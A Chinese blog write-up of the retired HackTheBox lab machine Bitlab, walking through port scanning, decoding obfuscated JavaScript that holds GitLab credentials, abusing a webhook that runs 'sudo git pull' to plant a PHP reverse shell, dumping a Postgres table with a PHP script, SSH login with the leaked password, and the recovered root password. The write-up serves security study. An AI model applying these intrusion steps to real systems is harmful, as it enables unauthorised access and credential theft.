HTB-靶机-Bitlab
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.114
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.114 -o ./Bitlab-autorecon sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.114 或者 sudo masscan -p1-65535,U:1-65535 10.10.10.114 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//') sudo nmap -Pn -sV -sC -p$ports 10.10.10.114
直接IP地址访问其80端口
发现是个gitlab的应用,在爆破目录之前先访问下robots.txt看看
显示不允许的东西太多了,经过测试访问,发现profile和help路径有敏感信息
发现上面显示的help路径里面还有个书签地址,点击进去发现有个Gitlab Login的超链接,在浏览器上直接查看对应显示的前端代码
var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"]; document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3]; document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; } var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"]; _0x4b18 ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"]
得到了登录目标靶机的gitlab的账户和密码
clave
11des0081x
成功登录到目标靶机的gitlab,发现属于管理员Administrator 下有两个仓库文件,分别是Deployer和Profile 翻看了一下
根据上面的信息,发现其中显示index.php代码的内容
<?php $input = file_get_contents("php://input"); $payload = json_decode($input); $repo = $payload->project->name ?? ''; $event = $payload->event_type ?? ''; $state = $payload->object_attributes->state ?? ''; $branch = $payload->object_attributes->target_branch ?? ''; if ($repo=='Profile' && $branch=='master' && $event=='merge_request' && $state=='merged') { echo shell_exec('cd ../profile/; sudo git pull'),"\n"; } echo "OK\n";
上述代码大概意思就是在仓库Profile下面,分支是master,同时合并请求就会执行sudo git pull 那么这里就可以上传反弹shell的php代码
成功上传
触发反弹shell,拿普通权限
查看网络链接发现开放了5432端口,确认存在Postgresql数据 想要访问这个数据库,但是目标存在目标靶机上的docker环境中,而且靶机上也没有客户端,只能通过php代码从端口里面访问
<?php $db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles"); $result = pg_query($db_connection, "SELECT * FROM profiles"); print_r(pg_fetch_all($result)); ?>
通过echo命令创建php代码文件
使用echo命令追加文件 echo '<?php $db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles"); $result = pg_query($db_connection, "SELECT * FROM profiles"); print_r(pg_fetch_all($result)); ?>' > pg.php
得到了登录目标靶机的ssh登录账户
www-data@bitlab:/tmp$ php -f pg.php Array ( [0] => Array ( [id] => 1 [username] => clave [password] => c3NoLXN0cjBuZy1wQHNz== ) ) 登录方式:sshpass -p 'c3NoLXN0cjBuZy1wQHNz==' ssh -oStrictHostKeyChecking=no clave@10.10.10.114
在家目录下发现一个二进制文件
使用scp将目标靶机的二进制文件传到本地kali
scp clave@10.10.10.114:RemoteConnection.exe .
二进制分析,目前还不是很擅长,可参考:
https://0xdf.gitlab.io/2020/01/11/htb-bitlab.html
得到root密码
root:Qf7]8YSV.wDNF*[7d?j&eD4^
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?